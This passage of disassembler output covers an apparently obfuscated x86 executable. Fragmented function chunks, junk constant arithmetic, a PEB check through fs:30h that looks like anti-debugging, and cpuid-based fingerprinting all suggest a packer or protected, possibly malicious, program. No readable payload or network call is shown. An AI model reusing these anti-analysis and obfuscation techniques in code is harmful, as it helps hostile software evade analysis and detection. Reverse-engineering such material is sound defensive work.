loc_428482: ; CODE XREF: _0182ofla:00427B46�j
jmp loc_4283D7
; ---------------------------------------------------------------------------
jmp loc_4240A6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427DA9
loc_42848C: ; CODE XREF: sub_4282B8-1E27�j
; sub_427DA9+48B4�j ...
jnz loc_42942C
mov eax, large fs:30h
push ecx
jmp loc_4295FF
; END OF FUNCTION CHUNK FOR sub_427DA9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428BBF
loc_42849F: ; CODE XREF: sub_428BBF:loc_42415F�j
cpuid
add [esi], eax
xor [esi], ebx
add [esi], ecx
xor [esi], edx
jmp loc_42D629
; END OF FUNCTION CHUNK FOR sub_428BBF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_4284AE: ; CODE XREF: sub_4253F4+14A0�j
mov eax, 1
xor ebx, ebx
xor edx, edx
jmp loc_42EB69
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429FC8
loc_4284BC: ; CODE XREF: sub_429FC8+D�j
call sub_423BE7
; END OF FUNCTION CHUNK FOR sub_429FC8
; START OF FUNCTION CHUNK FOR sub_42561D
loc_4284C1: ; CODE XREF: sub_42561D+205B�j
jmp nullsub_97
; END OF FUNCTION CHUNK FOR sub_42561D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424498
loc_4284C6: ; CODE XREF: sub_424498+2C7F�j
jmp nullsub_204
; END OF FUNCTION CHUNK FOR sub_424498
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426319
loc_4284CB: ; CODE XREF: sub_426319:loc_42759E�j
mov ebp, ebx
pop ebx
jmp loc_426A92
; END OF FUNCTION CHUNK FOR sub_426319
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
loc_4284D7: ; CODE XREF: _0182ofla:loc_425E0B�j
jmp loc_424BF0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42349B
loc_4284DC: ; CODE XREF: sub_42349B:loc_424D5F�j
ja loc_42CD11
jmp loc_42A3AC
; END OF FUNCTION CHUNK FOR sub_42349B
; =============== S U B R O U T I N E =======================================
sub_4284E7 proc near ; DATA XREF: sub_42798F+65C8�o
; FUNCTION CHUNK AT 00424402 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042B587 SIZE 00000005 BYTES
lea eax, [ebp-125h]
mov [ebp-20h], eax
loc_4284F0: ; CODE XREF: sub_425AB1:loc_42AF5C�j
mov eax, [ebp-1Ch]
cmp byte ptr [eax], 0
jnz loc_424402
jmp loc_42B587
sub_4284E7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_428501: ; CODE XREF: sub_423A2A:loc_42CB37�j
mov eax, offset dword_42A3C8
call sub_427BA0
loc_42850B: ; CODE XREF: sub_425C89-2044�j
jmp loc_423423
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428A39
loc_428510: ; CODE XREF: sub_4238A3+E�j
jmp sub_4294A4
; END OF FUNCTION CHUNK FOR sub_428A39
; ---------------------------------------------------------------------------
loc_428515: ; CODE XREF: _0182ofla:0042343C�j
jmp locret_42B158
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428C7D
loc_42851A: ; CODE XREF: sub_428C7D:loc_4257AD�j
sbb ebx, 5540B320h
jz loc_427866
shl ebx, 15h
or eax, 0ED5CA262h
or eax, 0FEE31A46h
rol ecx, 0Eh
xchg ebp, [esp-4+arg_0]
xchg eax, ebp
jmp loc_42C54E
; END OF FUNCTION CHUNK FOR sub_428C7D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CFAD
loc_428542: ; CODE XREF: sub_42CFAD+B�j
call sub_42461C
; END OF FUNCTION CHUNK FOR sub_42CFAD
; START OF FUNCTION CHUNK FOR sub_42798F
loc_428547: ; CODE XREF: _0182ofla:00424117�j
; sub_42798F:loc_425B22�j ...
call sub_424614
loc_42854C: ; DATA XREF: sub_4263F0+9�o
mov eax, [ebp+8]
mov eax, [eax-10h]
shr eax, 6
mov [ebp-10h], eax
; END OF FUNCTION CHUNK FOR sub_42798F
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_428558: ; CODE XREF: sub_425B6E:loc_424D33�j
jmp loc_427A8F
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428176
loc_42855D: ; CODE XREF: sub_428176+7�j
mov eax, ds:dword_42E8F0
or eax, eax
jnz loc_428E28
push ecx
push 80C71F08h
pop ecx
jmp loc_42ADAB
; END OF FUNCTION CHUNK FOR sub_428176
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C55
loc_428577: ; CODE XREF: sub_425C55-2650�j
mov [eax], ecx
mov ecx, 20B2DEFh
loc_42857E: ; CODE XREF: sub_425C55:loc_423CDF�j
push 86B2814Ch
mov eax, offset loc_428591
xchg eax, [esp-8+arg_4]
retn
; END OF FUNCTION CHUNK FOR sub_425C55
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42858C: ; CODE XREF: sub_42D056-8126�j
jmp loc_423DEC
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
loc_428591: ; DATA XREF: sub_425C55+292E�o
rol eax, 1Dh
jmp loc_42B218
; =============== S U B R O U T I N E =======================================
sub_428599 proc near ; CODE XREF: _0182ofla:00424796�j
; _0182ofla:0042E1C3�p
; FUNCTION CHUNK AT 00427F8E SIZE 0000000A BYTES
mov [esp+0], edx
pop edx
mov eax, [eax+0Ch]
mov eax, [eax+0Ch]
jmp loc_427F8E
sub_428599 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_4285A8: ; CODE XREF: sub_428F20:loc_423086�j
add [esi], eax
xor [esi], edx
cmp edi, 80000001h
jbe loc_42D629
jmp loc_424DC2
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
loc_4285BD: ; CODE XREF: _0182ofla:0042473F�j
add edx, 0DA0A1003h
loc_4285C3: ; CODE XREF: _0182ofla:0042472E�j
add edx, 8256EB1h
call sub_42762D
; START OF FUNCTION CHUNK FOR sub_426B01
loc_4285CE: ; CODE XREF: sub_426B01+4�j
jmp loc_424EDD
; END OF FUNCTION CHUNK FOR sub_426B01
; ---------------------------------------------------------------------------
loc_4285D3: ; CODE XREF: _0182ofla:loc_42E568�j
jnz loc_42ABC3
jmp loc_4287BC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_236. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E13B
loc_4285DF: ; CODE XREF: sub_42E13B+9�j
jmp nullsub_216
; END OF FUNCTION CHUNK FOR sub_42E13B
; ---------------------------------------------------------------------------
loc_4285E4: ; CODE XREF: _0182ofla:0042D495�j
jmp loc_42AFE4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_4285E9: ; CODE XREF: sub_4298DD+10�j
jmp loc_424C30
; END OF FUNCTION CHUNK FOR sub_4298DD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42662C
loc_4285EE: ; CODE XREF: sub_42662C+712F�j
jge loc_4248E3
; END OF FUNCTION CHUNK FOR sub_42662C
; START OF FUNCTION CHUNK FOR sub_42D71D
loc_4285F4: ; CODE XREF: sub_42D71D+9�j
jmp sub_423B08
; END OF FUNCTION CHUNK FOR sub_42D71D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EAB7
loc_4285F9: ; CODE XREF: sub_42EAB7-40E9�j
jmp loc_42C743
; END OF FUNCTION CHUNK FOR sub_42EAB7
; ---------------------------------------------------------------------------
or ebp, ecx
adc eax, ebx
test esi, 44CB6440h
jmp loc_4248DB
; =============== S U B R O U T I N E =======================================
sub_42860D proc near ; CODE XREF: sub_42E6CF+F�p
mov [esp+0], eax
ror eax, 13h
mov ds:dword_424BEC, eax
retn
sub_42860D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CB53
loc_42861A: ; CODE XREF: sub_42CB53+D�j
jmp loc_425808
; END OF FUNCTION CHUNK FOR sub_42CB53
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4295D6
loc_42861F: ; CODE XREF: sub_4295D6�j
push 8AD863DBh
mov [esp+4+var_4], ebp
mov ebp, esp
jmp loc_42DEBA
; END OF FUNCTION CHUNK FOR sub_4295D6
; ---------------------------------------------------------------------------
locret_42862E: ; CODE XREF: _0182ofla:004274BB�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42862F: ; CODE XREF: sub_428D63-B8F�j
jmp loc_42DE5E
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E52
loc_428634: ; CODE XREF: sub_429E52:loc_42C109�j
not edx
jmp loc_42A956
; END OF FUNCTION CHUNK FOR sub_429E52
; ---------------------------------------------------------------------------
jns loc_42A7EE
and ebx, ebp
jmp sub_42D6DD
; ---------------------------------------------------------------------------
loc_428648: ; DATA XREF: sub_42CE86+5�o
push 1735E117h
pop ecx
rol ecx, 17h
test ecx, 80000h
jmp loc_42CB7B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_35. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D8FF
loc_42865D: ; CODE XREF: sub_42D8FF-425E�j
jmp nullsub_148
; END OF FUNCTION CHUNK FOR sub_42D8FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427259
loc_428662: ; CODE XREF: sub_427259+1857�j
jmp nullsub_115
; END OF FUNCTION CHUNK FOR sub_427259
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_240. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A642
loc_428668: ; CODE XREF: sub_42A642-22C4�j
jmp loc_4276B4
; END OF FUNCTION CHUNK FOR sub_42A642
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427B02
loc_42866D: ; CODE XREF: sub_427B02:loc_4263DA�j
mov [ecx], ebx
adc esi, ebx
jmp loc_42EA80
; END OF FUNCTION CHUNK FOR sub_427B02
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_428676: ; CODE XREF: sub_42D056+17�j
jnz loc_42DE1D
jmp loc_427D21
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C89
loc_428681: ; CODE XREF: sub_425C89+454B�j
or ebp, 0AAB17020h
jmp loc_423C36
; END OF FUNCTION CHUNK FOR sub_425C89
; ---------------------------------------------------------------------------
pop ebp
jmp sub_426571
; ---------------------------------------------------------------------------
loc_428692: ; CODE XREF: _0182ofla:0042C255�j
mov [edi], eax
pop edi
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425DA5
loc_428696: ; CODE XREF: sub_425DA5+D74�j
jmp loc_42B61B
; END OF FUNCTION CHUNK FOR sub_425DA5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4255E9
loc_42869B: ; CODE XREF: sub_4255E9+5EE9�j
rol eax, 8
jmp loc_426B7C
; END OF FUNCTION CHUNK FOR sub_4255E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_4286A3: ; CODE XREF: sub_423FCD:loc_427011�j
call edx
xor eax, eax
retn
; END OF FUNCTION CHUNK FOR sub_423FCD
; =============== S U B R O U T I N E =======================================
sub_4286A8 proc near ; CODE XREF: sub_42C1B2-7A68�p
; sub_42798F:loc_427A3D�j
; FUNCTION CHUNK AT 00425485 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042DCF6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E4C7 SIZE 00000005 BYTES
call sub_423FCD
test al, al
jz nullsub_41
jmp loc_42DCF6
sub_4286A8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DD2A
loc_4286BA: ; CODE XREF: sub_42DD2A:loc_425D0E�j
; sub_42DD2A-596�j
mov ecx, [ebp-20h]
call sub_42340D
loc_4286C2: ; CODE XREF: _0182ofla:00427044�j
jb loc_42AE6F
; END OF FUNCTION CHUNK FOR sub_42DD2A
; =============== S U B R O U T I N E =======================================
sub_4286C8 proc near ; CODE XREF: sub_4240FC+2025�p
xchg esi, [esp+0]
pop esi
xor edx, edx
push edx
loc_4286CF: ; CODE XREF: _0182ofla:00429E04�j
call sub_42DA2D
loc_4286D4: ; CODE XREF: sub_4233F8+10�j
jmp sub_428D17
sub_4286C8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_4286D9: ; CODE XREF: sub_42798F:loc_429AF9�j
jz loc_427AA2
jmp loc_4274E8
; END OF FUNCTION CHUNK FOR sub_42798F
; =============== S U B R O U T I N E =======================================
sub_4286E4 proc near ; DATA XREF: _0182ofla:0042D9BE�o
; FUNCTION CHUNK AT 0042AB49 SIZE 0000000A BYTES
mov eax, [ebp-0Ch]
push eax
call sub_427239
loc_4286ED: ; CODE XREF: _0182ofla:0042D9B8�j
push 0CC557455h
pop eax
rol eax, 6
and eax, 0DB46E29Bh
xor eax, 11440133h
jmp loc_42AB49
sub_4286E4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427ED1
loc_428707: ; CODE XREF: sub_427ED1:loc_424E99�j
jnz loc_42D5E4
jmp loc_427D10
; END OF FUNCTION CHUNK FOR sub_427ED1
; ---------------------------------------------------------------------------
loc_428712: ; CODE XREF: _0182ofla:004289CC�j
adc esi, 6B61A9BDh
; =============== S U B R O U T I N E =======================================
sub_428718 proc near ; CODE XREF: _0182ofla:00426E58�p
; FUNCTION CHUNK AT 004274DD SIZE 00000001 BYTES
; FUNCTION CHUNK AT 0042EA8E SIZE 00000005 BYTES
mov [esp+0], ecx
pop ecx
mov eax, [eax]
jmp loc_42EA8E
sub_428718 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_428723: ; CODE XREF: _0182ofla:00426AC9�j
jge loc_426AF0
; =============== S U B R O U T I N E =======================================
sub_428729 proc near ; CODE XREF: sub_42326C:loc_42E063�p
; FUNCTION CHUNK AT 0042360A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004244CD SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042783B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042808A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004294DF SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042AE8A SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042C57F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C5C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C950 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042CD27 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042CEEB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E964 SIZE 0000000F BYTES
xchg esi, [esp+0]
pop esi
test eax, eax
jz loc_42D884
mov eax, 400h
call sub_42D70E
mov [ebp-8], eax
jmp loc_42CD27
sub_428729 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428747 proc near ; DATA XREF: sub_4253F4:loc_42D629�o
pop esi
pop ecx
pop ebx
pop ebp
retn
sub_428747 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_42874C: ; CODE XREF: sub_4253F4+9�j
add dword ptr [esi], 0F80586h
mov eax, 0
cpuid
jmp loc_426888
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426571
loc_42875E: ; CODE XREF: sub_426571+439F�j
test al, al
jnz loc_4262D2
mov eax, [ebp-4]
cmp byte ptr [eax], 0E8h
jnz loc_423C0A
call sub_426240
loc_428777: ; CODE XREF: sub_42935B+6�j
jmp nullsub_67
; END OF FUNCTION CHUNK FOR sub_426571
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4247FE
loc_42877C: ; CODE XREF: sub_4247FE+1898�j
jmp loc_42A73F
; END OF FUNCTION CHUNK FOR sub_4247FE
; =============== S U B R O U T I N E =======================================
sub_428781 proc near ; DATA XREF: sub_42448C+9DB2�o
mov eax, [eax+18h]
dec eax
test eax, eax
jl loc_425EE4
inc eax
call sub_427D47
sub_428781 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_424BCB
loc_428793: ; CODE XREF: sub_424BCB+D�j
jmp loc_423F19
; END OF FUNCTION CHUNK FOR sub_424BCB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_57. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D5EF
loc_428799: ; CODE XREF: sub_42D5EF-23A1�j
jmp nullsub_9
; END OF FUNCTION CHUNK FOR sub_42D5EF
; ---------------------------------------------------------------------------
loc_42879E: ; CODE XREF: _0182ofla:00427086�j
jmp loc_42899D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427942
loc_4287A3: ; CODE XREF: sub_42EAB7-40FB�j
; sub_427942:loc_42AD8D�j ...
jno loc_4294BC
test [ebp+var_8], 2
jz loc_425B13
push ebp
mov eax, [ebp+var_20]
call sub_4294AA
loc_4287BC: ; CODE XREF: _0182ofla:004285D9�j
jmp loc_4252D7
; END OF FUNCTION CHUNK FOR sub_427942
; ---------------------------------------------------------------------------
test eax, 0D8B1CC0Ah
jmp loc_42D637
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EAB7
loc_4287CC: ; CODE XREF: sub_42EAB7:loc_42AA1F�j
; _0182ofla:0042C442�j
push ecx
jmp loc_42C3BB
; END OF FUNCTION CHUNK FOR sub_42EAB7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426571
loc_4287D2: ; CODE XREF: sub_426571-2956�j
cmp dword ptr [ebp-8], 0
jle loc_4262D2
mov eax, [ebp-4]
xor edx, edx
push edx
push eax
mov eax, [ebp-8]
jmp loc_42708B
; END OF FUNCTION CHUNK FOR sub_426571
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424707
loc_4287EB: ; CODE XREF: sub_424707+2806�j
; _0182ofla:004295D0�j
add eax, 8C4EB504h
cmp ecx, eax
pop eax
cmp ecx, edx
pop ecx
jmp loc_426956
; END OF FUNCTION CHUNK FOR sub_424707
; ---------------------------------------------------------------------------
locret_4287FC: ; CODE XREF: _0182ofla:00424576�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_4287FD: ; CODE XREF: sub_42798F+2C49�j
jmp loc_4270F9
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_428802: ; DATA XREF: sub_42931E:loc_4263E6�o
add eax, ebp
add eax, 0FAFA9787h
call sub_42E35C
; START OF FUNCTION CHUNK FOR sub_424CD8
loc_42880F: ; CODE XREF: sub_424CD8+6�j
jmp nullsub_42
; END OF FUNCTION CHUNK FOR sub_424CD8
; ---------------------------------------------------------------------------
loc_428814: ; CODE XREF: _0182ofla:004248D6�j
jmp loc_42E385
; ---------------------------------------------------------------------------
push 0
call sub_4292E1
loc_428820: ; CODE XREF: _0182ofla:0042DEE2�j
jmp loc_427509
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_428825: ; CODE XREF: sub_425B6E+4CCD�j
jmp loc_42757E
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42940E
loc_42882A: ; CODE XREF: sub_42940E-4339�j
jmp loc_42CE32
; END OF FUNCTION CHUNK FOR sub_42940E
; ---------------------------------------------------------------------------
and edi, 0A47502D0h
pushf
jmp sub_42931E
; ---------------------------------------------------------------------------
loc_42883B: ; CODE XREF: _0182ofla:004242F2�j
pushf
; =============== S U B R O U T I N E =======================================
sub_42883C proc near ; CODE XREF: sub_42912B:loc_42767D�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042A6C7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D59E SIZE 00000015 BYTES
mov [esp+0], eax
pop eax
shl eax, 7
call sub_42CEA4
loc_428848: ; DATA XREF: _0182ofla:0042B534�o
push edi
push 62FDE682h
xchg ebp, [esp+4+var_4]
mov edi, ebp
pop ebp
add edi, 0CDEB955Dh
or edi, 0BFF41831h
add edi, 0B36493E6h
jmp loc_42A6C7
sub_42883C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42380D
loc_42886B: ; CODE XREF: sub_42380D:loc_42CEC1�j
jnz loc_42D01E
jmp loc_42C274
; END OF FUNCTION CHUNK FOR sub_42380D
; ---------------------------------------------------------------------------
cmp ebx, ecx
jmp loc_427038
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42887D: ; CODE XREF: sub_42D056:loc_42E636�j
pushf
jmp loc_4256DB
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_428883: ; CODE XREF: sub_42798F:loc_42B8CF�j
jz loc_4288DC
jmp loc_4257F8
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42888E: ; CODE XREF: sub_428D63+10�j
jnz loc_428B5E
jmp loc_426342
; END OF FUNCTION CHUNK FOR sub_428D63
; =============== S U B R O U T I N E =======================================
sub_428899 proc near ; DATA XREF: _0182ofla:0042DDF4�o
mov eax, [ebp-20h]
movzx eax, byte ptr [eax]
push offset sub_42D591
jmp nullsub_242
sub_428899 endp
; ---------------------------------------------------------------------------
loc_4288A9: ; DATA XREF: sub_42CC59:loc_427C5B�o
jmp loc_427916
; ---------------------------------------------------------------------------
mov eax, [ebp-4]
push eax
xchg ecx, esi
push esi
jmp loc_42E697
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_91. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4288BB proc near ; DATA XREF: sub_42892E:loc_42A312�o
push ebp
push offset sub_42EAFE
jmp nullsub_43
sub_4288BB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423127
loc_4288C6: ; CODE XREF: sub_423127:loc_425BD4�j
push 1E4BD895h
pop edi
add edi, 0E1F705E8h
jmp loc_4278C7
; END OF FUNCTION CHUNK FOR sub_423127
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_4288D7: ; CODE XREF: sub_42798F-218C�j
mov eax, 45815DFCh
loc_4288DC: ; CODE XREF: sub_42798F:loc_428883�j
call sub_4247FE
test eax, eax
jz loc_426069
call sub_4247FE
mov edx, 3BD2EC5Ch
call sub_42D71D
jmp loc_42DAC7
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_4288FD: ; CODE XREF: _0182ofla:00424A90�j
not ebp
popf
xor ebp, edx
jg loc_423F4A
; START OF FUNCTION CHUNK FOR sub_42D056
loc_428908: ; CODE XREF: _0182ofla:loc_423333�j
; _0182ofla:0042638C�j ...
mov eax, 6F7h
call sub_42C1D1
jnb loc_42AF93
push offset sub_42938A
jmp nullsub_159
; END OF FUNCTION CHUNK FOR sub_42D056
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_153. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_428923: ; CODE XREF: _0182ofla:004233D9�j
mov eax, [ebp-4]
mov [ebp-0Ch], eax
jmp sub_42469C
; =============== S U B R O U T I N E =======================================
sub_42892E proc near ; CODE XREF: sub_42798F-1E67�p
; sub_426A7F:loc_426753�j ...
; FUNCTION CHUNK AT 0042A312 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042AD93 SIZE 00000005 BYTES
jb sub_42ABB7
jmp loc_42A312
sub_42892E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B00
loc_428939: ; CODE XREF: sub_425B00+6DE4�j
jz loc_426DAB
push ebp
mov eax, [ebp-20h]
call sub_4261C9
jmp loc_425C50
; END OF FUNCTION CHUNK FOR sub_425B00
; =============== S U B R O U T I N E =======================================
sub_42894D proc near ; CODE XREF: _0182ofla:004293C3�j
; sub_424950:loc_42A6C2�p
xchg eax, [esp+0]
pop eax
call sub_428176
test eax, eax
jz loc_42D884
jmp loc_42418F
sub_42894D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_428963: ; DATA XREF: sub_426DC3+3�o
mov [ebp-4], eax
mov eax, [ebp-4]
mov [ebp-8], eax
mov eax, [ebp+8]
push eax
jmp loc_426673
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_428975: ; CODE XREF: sub_423A2A:loc_425A18�j
jnz loc_428363
call sub_424B70
loc_428980: ; CODE XREF: sub_42CA66+11D5�j
jmp loc_426F8C
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231F3
loc_428985: ; CODE XREF: sub_4231F3+A336�j
jmp loc_426588
; END OF FUNCTION CHUNK FOR sub_4231F3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427445
loc_42898A: ; CODE XREF: sub_427445+43AF�j
jmp nullsub_146
; END OF FUNCTION CHUNK FOR sub_427445
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_99. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42938A
loc_428990: ; CODE XREF: sub_42938A+E�j
jmp loc_42618E
; END OF FUNCTION CHUNK FOR sub_42938A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DF41
loc_428995: ; CODE XREF: sub_42DF41+8�j
rol eax, 1Bh
call sub_425471
loc_42899D: ; CODE XREF: _0182ofla:loc_42879E�j
push 0F402B234h
pop eax
xor eax, 81420DF4h
add eax, 2BB08B57h
xor eax, 0A0F14A47h
call sub_4265C0
jmp loc_42E2A4
; END OF FUNCTION CHUNK FOR sub_42DF41
; ---------------------------------------------------------------------------
jz loc_42A2DB
jmp sub_42380D
; ---------------------------------------------------------------------------
and edx, ebp
jmp loc_428712
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424289
loc_4289D1: ; CODE XREF: sub_424289:loc_428A49�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_424289
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4240FC
loc_4289D3: ; CODE XREF: _0182ofla:00425FAA�j
; sub_4240FC+2016�j
inc dword ptr [ebp-18h]
dec dword ptr [ebp-1Ch]
jnz loc_42A384
jmp loc_426260
; END OF FUNCTION CHUNK FOR sub_4240FC
; =============== S U B R O U T I N E =======================================
sub_4289E4 proc near ; CODE XREF: sub_4240FC-6C4�p
; sub_424080+9�p ...
; FUNCTION CHUNK AT 00423244 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423A7E SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00425A01 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004282C2 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00428394 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004290BF SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00429FB4 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042A877 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C286 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042C309 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042DA92 SIZE 00000005 BYTES
push ebp
jmp loc_423244
sub_4289E4 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_92. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_4289EB: ; CODE XREF: sub_423FCD-771�j
xchg eax, ebp
loc_4289ED: ; CODE XREF: sub_423FE2:loc_429CE4�j
pop large dword ptr fs:0
add esp, 4
mov eax, 52h
push edx
push 46444602h
pop edx
jmp loc_42C53C
; END OF FUNCTION CHUNK FOR sub_423FCD
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428A08 proc near ; CODE XREF: sub_42326C�j
; FUNCTION CHUNK AT 004244FE SIZE 00000005 BYTES
push ebp
mov ebp, esp
xchg ecx, ebp
push offset sub_425048
jmp loc_4244FE
sub_428A08 endp
; =============== S U B R O U T I N E =======================================
sub_428A17 proc near ; DATA XREF: sub_425629:loc_425644�o
; FUNCTION CHUNK AT 004298BC SIZE 00000005 BYTES
xchg edx, [esp+0]
jmp loc_4298BC
sub_428A17 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D15D
loc_428A1F: ; CODE XREF: sub_42D15D-92AF�j
